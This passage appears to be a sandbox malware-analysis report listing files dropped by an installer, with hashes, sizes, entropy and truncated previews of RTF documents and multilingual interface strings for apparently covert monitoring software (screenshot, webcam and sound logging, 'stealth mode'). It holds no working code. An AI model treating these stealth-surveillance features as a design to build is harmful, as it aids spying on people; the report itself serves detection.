                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1251\uc1\adeff31507\deff0\stshfdbch0\stshfloch31506\stshfhich31506\stshfbi31506\deflang1049\deflangfe1049\themelang1049\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset204\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f2\fbidi \fmodern\fcharset204\fprq1{\*\panose 02070309020205020404}Courier New;}{\f3\fbidi \froman\fcharset2\fprq2{\*\panose 05050102010706020507}Symbol;}{\f10\fbidi \fnil\fcharset2\fprq2{\*\panose 05000000000000000000}Wingdings;}..{\f34\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f37\fbidi \fswiss\fcharset204\fprq2{\*\panose 020f0502020204030204}Calibri;}..{\flomajor\f31500\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbmajor\f31501\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fhimajor\f31502\fbidi \froman\fcharset204\fprq2{\*\pano
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 2145
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):41676
                                                                                                                                                                                                                                                          Entropy (8bit):5.05075856281513
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:Bwqtxdo1SeUGLicPI0QhhiLVptabQhOsWx2rvx6qk0oDHvZlLMKFZ/6A9d:BvrUneKrsIA9d
                                                                                                                                                                                                                                                          MD5:CE47EF60A1B6296B4770FEE4454B1E06
                                                                                                                                                                                                                                                          SHA1:5B17759D122086E5E02A32BFB947A8746EF3076D
                                                                                                                                                                                                                                                          SHA-256:9BB74EA64A2AAEC3470E7EE10C1EE4CA70AC357CB6DDF9D6C810869B7A18BB25
                                                                                                                                                                                                                                                          SHA-512:2727839D56824EF21AB7F3340649483F576665EE1B561A2FD72ED31158B6FE2B854880558E991DF5F9B48125A8E85A1E3D88623C0282151285FBCA5470FFE7EA
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang2145\ansi\ansicpg1252\uc1\adeff31507\deff0\stshfdbch0\stshfloch31506\stshfhich31506\stshfbi31506\deflang1031\deflangfe1031\themelang1049\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset0\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f2\fbidi \fmodern\fcharset0\fprq1{\*\panose 02070309020205020404}Courier New;}{\f3\fbidi \froman\fcharset2\fprq2{\*\panose 05050102010706020507}Symbol;}{\f10\fbidi \fnil\fcharset2\fprq2{\*\panose 05000000000000000000}Wingdings;}..{\f10\fbidi \fnil\fcharset2\fprq2{\*\panose 05000000000000000000}Wingdings;}{\f37\fbidi \fswiss\fcharset0\fprq2{\*\panose 020f0502020204030204}Calibri;}{\f38\fbidi \fswiss\fcharset0\fprq2{\*\panose 020b0604030504040204}Tahoma;}..{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbmajor\f31501\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 2145
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):43859
                                                                                                                                                                                                                                                          Entropy (8bit):5.052664414201202
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:Bwqtxdo1SeUGLicPI0QhhiLVptabQhOsWx2G+xnd9MfUcL2L5Mc5255cRHjVlPw2:BvrUneKGsIA9B
                                                                                                                                                                                                                                                          MD5:F7320542A3AFF0FC824E6C8D5CA74FBC
                                                                                                                                                                                                                                                          SHA1:F3C273969AC71FB411A5677D23898B7FE0633BFF
                                                                                                                                                                                                                                                          SHA-256:FAAAACD62FDB8F2901ACD5D39CB2D54B9A728B463900AE08916DE586EE9CD521
                                                                                                                                                                                                                                                          SHA-512:8CD8ED594846968FD2932A0E396E4DD1833EC10C4CF4F187C80BE34378E55605AC190EE87A1A47AB335BF19764640FEC14F4A9CE7C5893877EAA995FADBC18BA
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang2145\ansi\ansicpg1252\uc1\adeff31507\deff0\stshfdbch0\stshfloch31506\stshfhich31506\stshfbi31506\deflang1031\deflangfe1031\themelang1049\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset0\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f2\fbidi \fmodern\fcharset0\fprq1{\*\panose 02070309020205020404}Courier New;}{\f3\fbidi \froman\fcharset2\fprq2{\*\panose 05050102010706020507}Symbol;}{\f10\fbidi \fnil\fcharset2\fprq2{\*\panose 05000000000000000000}Wingdings;}..{\f10\fbidi \fnil\fcharset2\fprq2{\*\panose 05000000000000000000}Wingdings;}{\f37\fbidi \fswiss\fcharset0\fprq2{\*\panose 020f0502020204030204}Calibri;}{\f38\fbidi \fswiss\fcharset0\fprq2{\*\panose 020b0604030504040204}Tahoma;}..{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbmajor\f31501\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 2145
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):52996
                                                                                                                                                                                                                                                          Entropy (8bit):5.037460927420348
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:Bk31e0/Yzc00QfHyUCp5N7G5V5V5h5G5P5N5TRrbGY+FNSdE2CUuHctO9P0CS0t0:BV0kIA9I
                                                                                                                                                                                                                                                          MD5:77A17A8F48C96F611F14429D732C1F73
                                                                                                                                                                                                                                                          SHA1:FE3F09AF1390F0C2F780A172450B3CCF54A09CD0
                                                                                                                                                                                                                                                          SHA-256:F2B98A3175FC09320625C396606DA5058A192A5AF54A0C61D491E5FCB7EC96C4
                                                                                                                                                                                                                                                          SHA-512:3A3AE1E13D1E24081A3913B34638DA25DC2FF39BBFB3151464B0E330828D9A3E3AB876E546E90C11E858FF1611F02686874D1106AF59A79F6399EC5DA7F60C26
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang2145\ansi\ansicpg1252\uc1\adeff31507\deff0\stshfdbch0\stshfloch31506\stshfhich31506\stshfbi31506\deflang1031\deflangfe1031\themelang1049\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset0\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f1\fbidi \fswiss\fcharset0\fprq2{\*\panose 020b0604020202020204}Arial;}{\f37\fbidi \fswiss\fcharset0\fprq2{\*\panose 020f0502020204030204}Calibri;}{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fhimajor\f31502\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria;}..{\fbimajor\f31503\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\flominor\f31504\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbminor\f31505\fbidi \from
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 2145
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):46778
                                                                                                                                                                                                                                                          Entropy (8bit):5.04213022372363
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:BbO4jB7F2njX8x3nF9k6Bvtk+k1pJKOQBX0hUH/EIvx9WahytOAnkWiwaTdnkmDk:B1hKIA9N
                                                                                                                                                                                                                                                          MD5:F60A5BBD42D01BA5BE2200C53152A370
                                                                                                                                                                                                                                                          SHA1:D5F8ED456623E3D8B44D6D87EDC705A0A27D0382
                                                                                                                                                                                                                                                          SHA-256:7E5BED54A681A9701FBD6B6C12A4A53594DECD4B60AE8087DB96DCAD23DDF72C
                                                                                                                                                                                                                                                          SHA-512:C66DA1A5D293F957A84B9B787B5487CD38A04DE39B4B955E1214954FE64FE14654265F942991A77816DB83BBED95818D1F5EE825B8C5AADD60B2A48EC1CEC841
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang2145\ansi\ansicpg1252\uc1\adeff31507\deff0\stshfdbch0\stshfloch31506\stshfhich31506\stshfbi31506\deflang1031\deflangfe1031\themelang1049\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset0\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f1\fbidi \fswiss\fcharset0\fprq2{\*\panose 020b0604020202020204}Arial;}{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fhimajor\f31502\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria;}..{\fbimajor\f31503\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\flominor\f31504\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbminor\f31505\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fhimino
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 2145
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):43450
                                                                                                                                                                                                                                                          Entropy (8bit):5.051452976930654
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:Bwqtxdo1SeUGLicPI0QhhiLVptabQhOsWx2DKxwaOqBdLE0aWsaeyXH62lGFcaZl:BvrUneKD/IA9B
                                                                                                                                                                                                                                                          MD5:843D629B19FC6C1C760CCCF79DCD8778
                                                                                                                                                                                                                                                          SHA1:E1FD65A3F296C7F966AD9A3CA7C6C970127FCC04
                                                                                                                                                                                                                                                          SHA-256:369458B9EAD9880E66B906332948AE38AEB74173BB24FEFD65B18438FECFCD23
                                                                                                                                                                                                                                                          SHA-512:0C3E239B14888868A2F5FB95A7446E22460819B6DE4C2AE8C23C1E31C25D4FC4B9A04D861ED516A975A8397DB621BA517AB29606FBEAFBD70E7A6131D2604D58
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang2145\ansi\ansicpg1252\uc1\adeff31507\deff0\stshfdbch0\stshfloch31506\stshfhich31506\stshfbi31506\deflang1031\deflangfe1031\themelang1049\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset0\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f2\fbidi \fmodern\fcharset0\fprq1{\*\panose 02070309020205020404}Courier New;}{\f3\fbidi \froman\fcharset2\fprq2{\*\panose 05050102010706020507}Symbol;}{\f10\fbidi \fnil\fcharset2\fprq2{\*\panose 05000000000000000000}Wingdings;}..{\f10\fbidi \fnil\fcharset2\fprq2{\*\panose 05000000000000000000}Wingdings;}{\f37\fbidi \fswiss\fcharset0\fprq2{\*\panose 020f0502020204030204}Calibri;}{\f38\fbidi \fswiss\fcharset0\fprq2{\*\panose 020b0604030504040204}Tahoma;}..{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbmajor\f31501\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 2145
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):42483
                                                                                                                                                                                                                                                          Entropy (8bit):5.0516758116152145
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:Bwqtxdo1SeUGLicPI0QhhiLVptabQhOsWx2DqxxqAJ7iYH2qlyTU6Z/6A9r:BvrUneKDZIA9r
                                                                                                                                                                                                                                                          MD5:4419419BD2ABBE30C63B730ADA875674
                                                                                                                                                                                                                                                          SHA1:2946FB19C980B330C1B4719AE6F915520709D99D
                                                                                                                                                                                                                                                          SHA-256:180D6187E16BE50A3649B861A5FB7580F0AE99E949FBE0EAC05FBB5B17BD6F99
                                                                                                                                                                                                                                                          SHA-512:2656094851AFBF719ECC12DE1AAA73C2040DA4FCCD7B4AB4E0FB6130472E606C5F8010A1D58C6D015F5DD8A71DB7C6E14811229FF2360F3D26BFAC4E737CE6A5
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang2145\ansi\ansicpg1252\uc1\adeff31507\deff0\stshfdbch0\stshfloch31506\stshfhich31506\stshfbi31506\deflang1031\deflangfe1031\themelang1049\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset0\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f2\fbidi \fmodern\fcharset0\fprq1{\*\panose 02070309020205020404}Courier New;}{\f3\fbidi \froman\fcharset2\fprq2{\*\panose 05050102010706020507}Symbol;}{\f10\fbidi \fnil\fcharset2\fprq2{\*\panose 05000000000000000000}Wingdings;}..{\f10\fbidi \fnil\fcharset2\fprq2{\*\panose 05000000000000000000}Wingdings;}{\f37\fbidi \fswiss\fcharset0\fprq2{\*\panose 020f0502020204030204}Calibri;}{\f38\fbidi \fswiss\fcharset0\fprq2{\*\panose 020b0604030504040204}Tahoma;}..{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbmajor\f31501\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 2145
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):43674
                                                                                                                                                                                                                                                          Entropy (8bit):5.051136691912746
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:Bwq6xdo1SeUGLicPI0QhhiLVptabQhOsWx2s2x7yjxsqoLq2IDSssDSsaD0iHw8V:BErUneKsyIA90
                                                                                                                                                                                                                                                          MD5:03D5DC91896BD88D15D82608B85FA10A
                                                                                                                                                                                                                                                          SHA1:741A620D22C4A157211C2972E53AF6C402E00036
                                                                                                                                                                                                                                                          SHA-256:0EB740A746A33237558E99DA3599DE9DE975F7CE6C8988CE3E602C89E130BCFD
                                                                                                                                                                                                                                                          SHA-512:5C211CC5A33A7590C5ECF2BCBE479A0EE1AD56CA300D136A752F6BF26CEEC2643825EDC3896550E21C436DB2B76AB895818BF4C9B3EF12E3E481374E322E37EB
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang2145\ansi\ansicpg1252\uc1\adeff31507\deff0\stshfdbch0\stshfloch31506\stshfhich31506\stshfbi31506\deflang1031\deflangfe1031\themelang1049\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset0\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f2\fbidi \fmodern\fcharset0\fprq1{\*\panose 02070309020205020404}Courier New;}{\f3\fbidi \froman\fcharset2\fprq2{\*\panose 05050102010706020507}Symbol;}{\f10\fbidi \fnil\fcharset2\fprq2{\*\panose 05000000000000000000}Wingdings;}..{\f10\fbidi \fnil\fcharset2\fprq2{\*\panose 05000000000000000000}Wingdings;}{\f37\fbidi \fswiss\fcharset0\fprq2{\*\panose 020f0502020204030204}Calibri;}{\f38\fbidi \fswiss\fcharset0\fprq2{\*\panose 020b0604030504040204}Tahoma;}..{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbmajor\f31501\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):42553
                                                                                                                                                                                                                                                          Entropy (8bit):5.039163820303254
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:qqOkDx1eVGh+DoLLXI1nhDGi3w2EHlT2njX8x3DldDMomI6u5DumZ/6A9X:qqb5nIA9X
                                                                                                                                                                                                                                                          MD5:34E55F7E9F1B2541BE0A17FB6871F9C9
                                                                                                                                                                                                                                                          SHA1:C9E188BCC39C88251CE9CBBA13E20F7BCA48F89F
                                                                                                                                                                                                                                                          SHA-256:B02273E5A9A45909D24B7349E45BE521B9421CB93CE1803BAE7B4FA317443376
                                                                                                                                                                                                                                                          SHA-512:D2C86622CD0726F5A480D11A3734C742D82853467CF3C1FB36F9ADE0873227862E26C366B8DD1E45B8D48F6AF62BA22FCD2C4C8FEEEEC6740B290F3E814ED65D
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1251\uc1\adeff31507\deff0\stshfdbch0\stshfloch31506\stshfhich31506\stshfbi31506\deflang1049\deflangfe1049\themelang1049\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset204\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f2\fbidi \fmodern\fcharset204\fprq1{\*\panose 02070309020205020404}Courier New;}{\f3\fbidi \froman\fcharset2\fprq2{\*\panose 05050102010706020507}Symbol;}{\f10\fbidi \fnil\fcharset2\fprq2{\*\panose 05000000000000000000}Wingdings;}..{\f34\fbidi \froman\fcharset1\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f37\fbidi \fswiss\fcharset204\fprq2{\*\panose 020f0502020204030204}Calibri;}..{\flomajor\f31500\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbmajor\f31501\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fhimajor\f31502\fbidi \froman\fcharset204\fprq2{\*\panose
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):17081
                                                                                                                                                                                                                                                          Entropy (8bit):5.237330658373566
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:384:fd+wUQhflYfUg7EXwoXy5Pt/5k9bS+RnNMvjxYay:fVli88Pt/ObVNsxYay
                                                                                                                                                                                                                                                          MD5:665E034C26764DC99A3E8C8A9EDC54BB
                                                                                                                                                                                                                                                          SHA1:4CBF034140A28CF6BBF436C13D718E588DCA20BD
                                                                                                                                                                                                                                                          SHA-256:4E8BBFDEFB2414F62B84AB41831EBAC15E8D5571022B14FF697C6788D0A73068
                                                                                                                                                                                                                                                          SHA-512:DE73A62A6930B91563D67DC38F14549269285A75E9B0C36285E455AE85D4A2FD423CCBE0095A489AC795EB6D97210CE2FCEC25322CF6A1EDDD5EB9A2085741A2
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:[LngFile]..###############################################################################..####### Attention! Do Not change the key phrases left of sign "="! ############..###############################################################################..tbStart="Ba.la"..tbStartHint="G.nl.k tutmay. a."..tbStop="Durdur"..tbStopHint="G.nl.k tutmay. kapat"..tbFind="Bul"..tbFindHint="G.nl.k bilgisi ara"..tbSetting="Ayarlar"..tbSettingHint="Program ayarlar."..tbAbout="Hakk.nda"..tbAboutHint="Hakk.nda / kay.t bilgisi"..tbHomePage="Ana Sayfa"..tbHomePageHint="Program.n Ana Sayfas.na Git"..tbToday="Bug.n"..tbTodayHint="Bug.n.n g.nl...ne git"..tbHide="Gizle"..tbHideHint="Gizlilik modu (Sistem .ubu.unda hi. simge yok)"..tbMinimize="K...lt"..tbMinimizeHint="Simge Durumuna K...lt"..tbExit="..k"..tbExitHint="..k ve g.nl... durdur"..gbLog="Olay G.nl..."..tCurrLogSize="G.nl.k Boyutu (Mb)"..tCurrScrSize="Ekran Resmi Boyutu (Mb)"..tCurrSnpSize="Web Kameras.
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):17468
                                                                                                                                                                                                                                                          Entropy (8bit):4.879377232061119
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:192:f9xAt+/MjlJ/5mOT3Y7hzjeJRz1QIGiGU/F6lDCDjY3qfTmXq6Cf3CxMprBarJKW:f9xAt+/YJRm7hzjqRzlXjUo7Qgo7c8DD
                                                                                                                                                                                                                                                          MD5:C3930BE227C51A5887BFB0F6D8575548
                                                                                                                                                                                                                                                          SHA1:D6A32283BC35FE18207EDAE4626D5D299CE50592
                                                                                                                                                                                                                                                          SHA-256:E50FDC95BC49000FF5DC52A830925CEDF684B2F7100397BFB22D8D5430E920F0
                                                                                                                                                                                                                                                          SHA-512:F42F25DAC17F0096CA2EA998E0B84A1A8CFFABAB5256C24DAAA1210F50DB43D903D481C64C98250EB7A5297684582D085540EA445F6E7156DBA3ADC42410AA57
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:[LngFile]..###############################################################################..####### Attention! Do Not change the key phrases left of sign "="! ############..###############################################################################..tbStart="Start"..tbStartHint="Enable logging"..tbStop="Stop"..tbStopHint="Disable logging"..tbFind="Find"..tbFindHint="Search for log information"..tbSetting="Settings"..tbSettingHint="Program settings"..tbAbout="About"..tbAboutHint="About / registration info"..tbHomePage="Home Page"..tbHomePageHint="Go to the Program Home Page"..tbToday="Today"..tbTodayHint="Go to todays log"..tbHide="Hide"..tbHideHint="Stealth mode (no icon in the System Tray)"..tbMinimize="Minimize"..tbMinimizeHint="Minimize to Tray"..tbExit="Exit"..tbExitHint="Exit and stop log"..gbLog="Event Log"..tCurrLogSize="Log Size (Mb)"..tCurrScrSize="Screenshots Size (Mb)"..tCurrSnpSize="Webcam Snapshots size (Mb)"..tCurrSoundsSize="Sound files size (Mb)"..tCurrVideosSize="W
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):19915
                                                                                                                                                                                                                                                          Entropy (8bit):4.91205436276521
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:384:URE/HLpJKNLC8/c0vrhUhdpZ/i7fTfHV8Vpx+M26iYi/pVF8g2EM2luoEJroH:Ue4L5c0dffTfHV8Vpx126PGcIMoH
                                                                                                                                                                                                                                                          MD5:86FB78830003953DE6F23C5978938899
                                                                                                                                                                                                                                                          SHA1:CD181B6DD4049697DD2E824DCABB57D9B21CCE0A
                                                                                                                                                                                                                                                          SHA-256:0E132271314F42D37505EA9844E8EE102B9A0FC65946852BE8150CD088BB8357
                                                                                                                                                                                                                                                          SHA-512:8862242298848BF0096B63F5F0FDDC70C446239910DD16F7B5AB604414CB6D10DFB636A7BC7AD1D66F33B6D88DCC08EE95F0B0B04E686E74E68FFBF9EC70C47A
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:.[LngFile]..###############################################################################..####### Attention! Do Not change the key phrases left of sign "="! ############..###############################################################################..tbStart=" Empec."..tbStartHint="Habilite el registro"..tbStop="Det.ngase"..tbStopHint="Desactive el registro"..tbFind="Encuentre"..tbFindHint="Busque la informaci.n del registro"..tbSetting="Ajustes"..tbSettingHint="Ajustes del programa"..tbAbout="Acerca de"..tbAboutHint="Acerca de / informaci.n de registro"..tbHomePage="P.gina Principal"..tbHomePageHint="Ir a la P.gina Principal del programa"..tbToday="Hoy"..tbTodayHint="Ir al registro de hoy"..tbHide="Oculte"..tbHideHint="El modo invisible (ninguno icono en la bandeja del sistema)"..tbMinimize="Minimice"..tbMinimizeHint="Minimizar a la bandeja"..tbExit="Salir"..tbExitHint="Salir y parada del registro"..gbLog="Registro de eventos"..tCurrLogSize="Tama.o del registro (Mb)"..tCu
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):19350
                                                                                                                                                                                                                                                          Entropy (8bit):4.977328299832863
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:192:UfZj6oFtyWJJJuou35vzX6FcNnAy9+1C9ou8drw+MjKcEdQAi2jC+WUH:UfZj6oFtyWXRybX6Ad4C9q+pEdbvXx
                                                                                                                                                                                                                                                          MD5:05104FA93BC4180DCD6752F77382F263
                                                                                                                                                                                                                                                          SHA1:2A83710D4B63BF666D681D3F5E9C21324EB2581C
                                                                                                                                                                                                                                                          SHA-256:A2150D0BBC660122C1C183FCA420CFAAE7539956F20BA135DEC4655B3B212A6E
                                                                                                                                                                                                                                                          SHA-512:54ACDEAB94D389256C90FFB31934AE0182D7CB4F644CA671EE5F9599697357244B7F2F9CEA33D3CBE70463615389BF02E148818F99E9513DAF9A4D44B05913CD
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:.[LngFile]..###############################################################################..####### Attention! Do Not change the key phrases left of sign "="! ############..###############################################################################..tbStart="In.cio"..tbStartHint="Habilitar registro"..tbStop="Parar"..tbStopHint="Desabilitar registro"..tbFind="Buscar"..tbFindHint="Procurar por informa..o de registro"..tbSetting="Configura..es"..tbSettingHint=" Configura..es de programa"..tbAbout="Sobre"..tbAboutHint="Sobre / informa..es de registro"..tbHomePage="P.gina Inicial"..tbHomePageHint="Ir para a P.gina Inicial do Programa"..tbToday="Hoje"..tbTodayHint="Ir para o registro de hoje"..tbHide="Ocultar"..tbHideHint="Modo Furtivo (nenhum .cone na Bandeja do Sistema)"..tbMinimize="Minimizar"..tbMinimizeHint="Minimizar Bandeja"..tbExit="Sair"..tbExitHint="Sair e parar o registro"..gbLog="Registro de Eventos"..tCurrLogSize="Tamanho do Log - Registro (Mb)"..tCurrScrSize=
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
